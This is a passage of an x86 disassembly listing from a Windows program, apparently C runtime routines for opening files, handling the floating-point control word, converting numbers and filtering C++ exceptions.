mov [ebp+var_C], 80000000h
loc_41FF50: ; CODE XREF: sub_41FEC6+78�j
; sub_41FEC6+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41FF7E
cmp eax, 20h
jz short loc_41FF75
cmp eax, 30h
jz short loc_41FF6C
cmp eax, 40h
jnz short loc_41FF22
mov [ebp+var_10], esi
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF6C: ; CODE XREF: sub_41FEC6+9A�j
mov [ebp+var_10], 2
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF75: ; CODE XREF: sub_41FEC6+95�j
mov [ebp+var_10], 1
jmp short loc_41FF81
; ---------------------------------------------------------------------------
loc_41FF7E: ; CODE XREF: sub_41FEC6+90�j
mov [ebp+var_10], ebx
loc_41FF81: ; CODE XREF: sub_41FEC6+A4�j
; sub_41FEC6+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41FFCB
jz short loc_41FFC6
cmp ecx, ebx
jz short loc_41FFC6
cmp ecx, edi
jz short loc_41FFBD
cmp ecx, 200h
jz short loc_41FFE4
cmp ecx, 300h
jnz loc_41FF22
mov [ebp+var_8], 2
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFBD: ; CODE XREF: sub_41FEC6+D8�j
mov [ebp+var_8], 4
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFC6: ; CODE XREF: sub_41FEC6+D0�j
; sub_41FEC6+D4�j
mov [ebp+var_8], esi
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFCB: ; CODE XREF: sub_41FEC6+CE�j
cmp ecx, 500h
jz short loc_41FFED
cmp ecx, 600h
jz short loc_41FFE4
cmp ecx, edx
jz short loc_41FFED
jmp loc_41FF22
; ---------------------------------------------------------------------------
loc_41FFE4: ; CODE XREF: sub_41FEC6+E0�j
; sub_41FEC6+113�j
mov [ebp+var_8], 5
jmp short loc_41FFF4
; ---------------------------------------------------------------------------
loc_41FFED: ; CODE XREF: sub_41FEC6+10B�j
; sub_41FEC6+117�j
mov [ebp+var_8], 1
loc_41FFF4: ; CODE XREF: sub_41FEC6+F5�j
; sub_41FEC6+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_420013
mov ecx, ds:dword_48A01C
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_420013
push 1
pop esi
loc_420013: ; CODE XREF: sub_41FEC6+138�j
; sub_41FEC6+148�j
test al, 40h
jz short loc_420021
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_420021: ; CODE XREF: sub_41FEC6+14F�j
test ah, 10h
jz short loc_420028
or esi, edi
loc_420028: ; CODE XREF: sub_41FEC6+15E�j
test al, 20h
jz short loc_420034
or esi, 8000000h
jmp short loc_42003E
; ---------------------------------------------------------------------------
loc_420034: ; CODE XREF: sub_41FEC6+164�j
test al, 10h
jz short loc_42003E
or esi, 10000000h
loc_42003E: ; CODE XREF: sub_41FEC6+16C�j
; sub_41FEC6+170�j
call sub_41FCAC
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_42005F
and ds:dword_48A018, 0
mov ds:dword_48A014, 18h
jmp short loc_42009D
; ---------------------------------------------------------------------------
loc_42005F: ; CODE XREF: sub_41FEC6+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:off_424084
mov esi, eax
cmp esi, edi
jz short loc_420090
push esi
call ds:dword_424030 ; GetFileType
test eax, eax
jnz short loc_4200A4
push esi
call ds:off_424078
loc_420090: ; CODE XREF: sub_41FEC6+1B6�j
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
call sub_41EF44
pop ecx
loc_42009D: ; CODE XREF: sub_41FEC6+197�j
mov eax, edi
jmp loc_42017A
; ---------------------------------------------------------------------------
loc_4200A4: ; CODE XREF: sub_41FEC6+1C1�j
cmp eax, 2
jnz short loc_4200AF
or [ebp+var_1], 40h
jmp short loc_4200B8
; ---------------------------------------------------------------------------
loc_4200AF: ; CODE XREF: sub_41FEC6+1E1�j
cmp eax, 3
jnz short loc_4200B8
or [ebp+var_1], 8
loc_4200B8: ; CODE XREF: sub_41FEC6+1E7�j
; sub_41FEC6+1EC�j
push esi
push ebx
call sub_41FD41
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:48B340h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_420161
test al, 80h
jz short loc_420161
test byte ptr [ebp+arg_4], 2
jz short loc_420161
push 2
push 0FFFFFFFFh
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_420116
cmp ds:dword_48A018, 83h
jz short loc_420161
jmp short loc_420155
; ---------------------------------------------------------------------------
loc_420116: ; CODE XREF: sub_41FEC6+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41E321
add esp, 0Ch
test eax, eax
jnz short loc_420143
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_420143
push [ebp+var_10]
push ebx
call sub_4211F1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_420155
loc_420143: ; CODE XREF: sub_41FEC6+265�j
; sub_41FEC6+26B�j
push 0
push 0
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_420161
loc_420155: ; CODE XREF: sub_41FEC6+24E�j
; sub_41FEC6+27B�j
push ebx
call sub_41A6B7
pop ecx
loc_42015C: ; CODE XREF: sub_41FEC6+6C�j
or eax, 0FFFFFFFFh
jmp short loc_42017A
; ---------------------------------------------------------------------------
loc_420161: ; CODE XREF: sub_41FEC6+221�j
; sub_41FEC6+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_420178
test byte ptr [ebp+arg_4], 8
jz short loc_420178
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_420178: ; CODE XREF: sub_41FEC6+29F�j
; sub_41FEC6+2A5�j
mov eax, ebx
loc_42017A: ; CODE XREF: sub_41FEC6+1D9�j
; sub_41FEC6+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FEC6 endp
; =============== S U B R O U T I N E =======================================
sub_42017F proc near ; CODE XREF: sub_41C50A+52�p
xor eax, eax
retn
sub_42017F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420182 proc near ; CODE XREF: sub_4201B7+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_4201CD
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_42025F
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_420182 endp
; =============== S U B R O U T I N E =======================================
sub_4201B7 proc near ; CODE XREF: sub_41C7F6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_420182
pop ecx
pop ecx
retn
sub_4201B7 endp
; =============== S U B R O U T I N E =======================================
sub_4201CD proc near ; CODE XREF: sub_420182+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_4201DE
push 10h
pop eax
loc_4201DE: ; CODE XREF: sub_4201CD+C�j
test bl, 4
jz short loc_4201E5
or al, 8
loc_4201E5: ; CODE XREF: sub_4201CD+14�j
test bl, 8
jz short loc_4201EC
or al, 4
loc_4201EC: ; CODE XREF: sub_4201CD+1B�j
test bl, 10h
jz short loc_4201F3
or al, 2
loc_4201F3: ; CODE XREF: sub_4201CD+22�j
test bl, 20h
jz short loc_4201FA
or al, 1
loc_4201FA: ; CODE XREF: sub_4201CD+29�j
test bl, 2
jz short loc_420204
or eax, 80000h
loc_420204: ; CODE XREF: sub_4201CD+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_42023C
cmp edx, 400h
jz short loc_420239
cmp edx, 800h
jz short loc_420235
cmp edx, esi
jnz short loc_42023C
or eax, edi
jmp short loc_42023C
; ---------------------------------------------------------------------------
loc_420235: ; CODE XREF: sub_4201CD+5E�j
or eax, ebp
jmp short loc_42023C
; ---------------------------------------------------------------------------
loc_420239: ; CODE XREF: sub_4201CD+56�j
or ah, 1
loc_42023C: ; CODE XREF: sub_4201CD+4E�j
; sub_4201CD+62�j ...
and ecx, edi
pop esi
jz short loc_42024C
cmp ecx, ebp
jnz short loc_420251
or eax, 10000h
jmp short loc_420251
; ---------------------------------------------------------------------------
loc_42024C: ; CODE XREF: sub_4201CD+72�j
or eax, 20000h
loc_420251: ; CODE XREF: sub_4201CD+76�j
; sub_4201CD+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_42025E
or eax, 40000h
locret_42025E: ; CODE XREF: sub_4201CD+8A�j
retn
sub_4201CD endp
; =============== S U B R O U T I N E =======================================
sub_42025F proc near ; CODE XREF: sub_420182+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_42026F
push 1
pop eax
loc_42026F: ; CODE XREF: sub_42025F+B�j
test bl, 8
jz short loc_420276
or al, 4
loc_420276: ; CODE XREF: sub_42025F+13�j
test bl, 4
jz short loc_42027D
or al, 8
loc_42027D: ; CODE XREF: sub_42025F+1A�j
test bl, 2
jz short loc_420284
or al, 10h
loc_420284: ; CODE XREF: sub_42025F+21�j
test bl, 1
jz short loc_42028B
or al, 20h
loc_42028B: ; CODE XREF: sub_42025F+28�j
test ebx, 80000h
jz short loc_420295
or al, 2
loc_420295: ; CODE XREF: sub_42025F+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_4202C2
cmp ecx, 100h
jz short loc_4202BF
cmp ecx, esi
jz short loc_4202BA
cmp ecx, edx
jnz short loc_4202C2
or ah, 0Ch
jmp short loc_4202C2
; ---------------------------------------------------------------------------
loc_4202BA: ; CODE XREF: sub_42025F+50�j
or ah, 8
jmp short loc_4202C2
; ---------------------------------------------------------------------------
loc_4202BF: ; CODE XREF: sub_42025F+4C�j
or ah, 4
loc_4202C2: ; CODE XREF: sub_42025F+44�j
; sub_42025F+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4202D8
cmp ecx, 10000h
jnz short loc_4202DA
or eax, esi
jmp short loc_4202DA
; ---------------------------------------------------------------------------
loc_4202D8: ; CODE XREF: sub_42025F+6B�j
or eax, edx
loc_4202DA: ; CODE XREF: sub_42025F+73�j
; sub_42025F+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_4202E7
or ah, 10h
locret_4202E7: ; CODE XREF: sub_42025F+83�j
retn
sub_42025F endp
; =============== S U B R O U T I N E =======================================
sub_4202E8 proc near ; CODE XREF: sub_420387+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_42032D
inc esi
cmp esi, 3
jge short loc_420328
lea eax, [eax+esi*4]
loc_42031A: ; CODE XREF: sub_4202E8+3E�j
cmp dword ptr [eax], 0
jnz short loc_42032D
inc esi
add eax, 4
cmp esi, 3
jl short loc_42031A
loc_420328: ; CODE XREF: sub_4202E8+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42032D: ; CODE XREF: sub_4202E8+27�j
; sub_4202E8+35�j
xor eax, eax
pop esi
retn
sub_4202E8 endp
; =============== S U B R O U T I N E =======================================
sub_420331 proc near ; CODE XREF: sub_420387+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_421337
add esp, 0Ch
dec esi
js short loc_420383
lea edi, [ebx+esi*4]
loc_42036A: ; CODE XREF: sub_420331+50�j
test eax, eax
jz short loc_420383
push edi
push 1
push dword ptr [edi]
call sub_421337
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_42036A
loc_420383: ; CODE XREF: sub_420331+34�j
; sub_420331+3B�j
pop edi
pop esi
pop ebx
retn
sub_420331 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420387 proc near ; CODE XREF: sub_4204E2+81�p
; sub_4204E2+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_4203EB
inc ebx
push ebx
push [ebp+arg_0]
call sub_4202E8
pop ecx
test eax, eax
pop ecx
jnz short loc_4203E8
push edi
push [ebp+arg_0]
call sub_420331
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_4203E8: ; CODE XREF: sub_420387+51�j
mov eax, [ebp+arg_4]
loc_4203EB: ; CODE XREF: sub_420387+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_42040B
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_42040B: ; CODE XREF: sub_420387+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_420387 endp
; =============== S U B R O U T I N E =======================================
sub_420413 proc near ; CODE XREF: sub_4204E2+75�p
; sub_4204E2+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_420421: ; CODE XREF: sub_420413+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_420421
pop esi
retn
sub_420413 endp
; =============== S U B R O U T I N E =======================================
sub_42042E proc near ; CODE XREF: sub_4204E2+5F�p
; sub_4204E2+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_42042E endp
; =============== S U B R O U T I N E =======================================
sub_42043A proc near ; CODE XREF: sub_4204E2+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_420440: ; CODE XREF: sub_42043A+12�j
cmp dword ptr [eax], 0
jnz short loc_420452
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_420440
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_420452: ; CODE XREF: sub_42043A+9�j
xor eax, eax
retn
sub_42043A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420455 proc near ; CODE XREF: sub_4204E2+C0�p
; sub_4204E2+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_42048B: ; CODE XREF: sub_420455+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_42048B
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_4204BD: ; CODE XREF: sub_420455+86�j
cmp ebx, edi
jl short loc_4204D0
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_4204D7
; ---------------------------------------------------------------------------
loc_4204D0: ; CODE XREF: sub_420455+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_4204D7: ; CODE XREF: sub_420455+79�j
dec ebx
sub ecx, 4
jns short loc_4204BD
pop edi
pop esi
pop ebx
leave
retn
sub_420455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204E2 proc near ; CODE XREF: sub_42064E+D�p
; sub_420664+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_42054F
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_42043A
test eax, eax
pop ecx
jnz loc_42060E
lea eax, [ebp+var_C]
push eax
call sub_42042E
pop ecx
loc_420547: ; CODE XREF: sub_4204E2+E4�j
push 2
loc_420549: ; CODE XREF: sub_4204E2+110�j
pop eax
jmp loc_420610
; ---------------------------------------------------------------------------
loc_42054F: ; CODE XREF: sub_4204E2+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_420413
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_420387
add esp, 10h
test eax, eax
jz short loc_420570
inc ebx
loc_420570: ; CODE XREF: sub_4204E2+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_420588
lea eax, [ebp+var_C]
push eax
call sub_42042E
pop ecx
jmp short loc_4205C4
; ---------------------------------------------------------------------------
loc_420588: ; CODE XREF: sub_4204E2+98�j
cmp ebx, eax
jg short loc_4205CB
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_420413
lea eax, [ebp+var_C]
push esi
push eax
call sub_420455
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_420387
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_420455
add esp, 20h
loc_4205C4: ; CODE XREF: sub_4204E2+A4�j
xor esi, esi
jmp loc_420547
; ---------------------------------------------------------------------------
loc_4205CB: ; CODE XREF: sub_4204E2+A8�j
cmp ebx, [edi]
jl short loc_4205F7
lea eax, [ebp+var_C]
push eax
call sub_42042E
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_420455
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_420549
; ---------------------------------------------------------------------------
loc_4205F7: ; CODE XREF: sub_4204E2+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_420455
pop ecx
pop ecx
loc_42060E: ; CODE XREF: sub_4204E2+55�j
xor eax, eax
loc_420610: ; CODE XREF: sub_4204E2+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_42063F
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_420649
; ---------------------------------------------------------------------------
loc_42063F: ; CODE XREF: sub_4204E2+14E�j
cmp edi, 20h
jnz short loc_420649
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_420649: ; CODE XREF: sub_4204E2+15B�j
; sub_4204E2+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_4204E2 endp
; =============== S U B R O U T I N E =======================================
sub_42064E proc near ; CODE XREF: sub_42067A+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43BF40
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4204E2
add esp, 0Ch
retn
sub_42064E endp
; =============== S U B R O U T I N E =======================================
sub_420664 proc near ; CODE XREF: sub_4206A7+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43BF58
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4204E2
add esp, 0Ch
retn
sub_420664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42067A proc near ; CODE XREF: sub_41C92F+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4214D8
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_42064E
add esp, 24h
leave
retn
sub_42067A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206A7 proc near ; CODE XREF: sub_41C92F+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4214D8
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_420664
add esp, 24h
leave
retn
sub_4206A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206D4 proc near ; CODE XREF: sub_41C96D+65�p
; sub_41CA71+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_420711
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_4206F7: ; CODE XREF: sub_4206D4+38�j
mov dl, [ecx]
test dl, dl
jz short loc_420703
movsx edx, dl
inc ecx
jmp short loc_420706
; ---------------------------------------------------------------------------
loc_420703: ; CODE XREF: sub_4206D4+27�j
push 30h
pop edx
loc_420706: ; CODE XREF: sub_4206D4+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_4206F7
mov edx, [ebp+arg_8]
loc_420711: ; CODE XREF: sub_4206D4+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_42072A
cmp byte ptr [ecx], 35h
jl short loc_42072A
loc_42071D: ; CODE XREF: sub_4206D4+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_420728
mov byte ptr [eax], 30h
jmp short loc_42071D
; ---------------------------------------------------------------------------
loc_420728: ; CODE XREF: sub_4206D4+4D�j
inc byte ptr [eax]
loc_42072A: ; CODE XREF: sub_4206D4+42�j
; sub_4206D4+47�j
cmp byte ptr [esi], 31h
jnz short loc_420734
inc dword ptr [edx+4]
jmp short loc_420746
; ---------------------------------------------------------------------------
loc_420734: ; CODE XREF: sub_4206D4+59�j
push edi
call sub_417AB0
inc eax
push eax
push edi
push esi
call sub_4182C0
add esp, 10h
loc_420746: ; CODE XREF: sub_4206D4+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4206D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42074B proc near ; CODE XREF: sub_41C96D+3F�p
; sub_41CA71+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_4207AF
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_48A1E8
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_4219A9
mov ds:dword_48A210, eax
add esp, 18h
movsx eax, ds:byte_48A1EA
mov ds:dword_48A208, eax
pop edi
movsx eax, ds:word_48A1E8
mov ds:dword_48A20C, eax
mov ds:dword_48A214, offset dword_48A1EC
mov eax, offset dword_48A208
pop esi
leave
retn
sub_42074B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207AF proc near ; CODE XREF: sub_42074B+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_4207FD
cmp ebx, edi
jz short loc_4207F6
lea edi, [ecx+3C00h]
jmp short loc_42081E
; ---------------------------------------------------------------------------
loc_4207F6: ; CODE XREF: sub_4207AF+3D�j
mov edi, 7FFFh
jmp short loc_42081E
; ---------------------------------------------------------------------------
loc_4207FD: ; CODE XREF: sub_4207AF+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_420815
cmp edx, ebx
jnz short loc_420815
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_420860
; ---------------------------------------------------------------------------
loc_420815: ; CODE XREF: sub_4207AF+52�j
; sub_4207AF+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_42081E: ; CODE XREF: sub_4207AF+45�j
; sub_4207AF+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_420836: ; CODE XREF: sub_4207AF+A6�j
test ecx, esi
jnz short loc_420857
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_420836
; ---------------------------------------------------------------------------
loc_420857: ; CODE XREF: sub_4207AF+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_420860: ; CODE XREF: sub_4207AF+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_4207AF endp
; ---------------------------------------------------------------------------
push 2
call sub_419CDA
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_42086E proc near ; DATA XREF: sub_4208B4�o _2:0043B918�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_420891
cmp dword ptr [eax+10h], 3
jnz short loc_420891
cmp dword ptr [eax+14h], 19930520h
jnz short loc_420891
jmp sub_41D4FC
; ---------------------------------------------------------------------------
loc_420891: ; CODE XREF: sub_42086E+D�j
; sub_42086E+13�j ...
mov eax, ds:dword_48A218
test eax, eax
jz short loc_4208AE
push eax
call sub_42090A
test eax, eax
pop ecx
jz short loc_4208AE
push esi
call ds:dword_48A218
jmp short loc_4208B0
; ---------------------------------------------------------------------------
loc_4208AE: ; CODE XREF: sub_42086E+2A�j
; sub_42086E+35�j
xor eax, eax
loc_4208B0: ; CODE XREF: sub_42086E+3E�j
pop esi
retn 4
sub_42086E endp
; =============== S U B R O U T I N E =======================================
sub_4208B4 proc near ; DATA XREF: _2:00426024�o
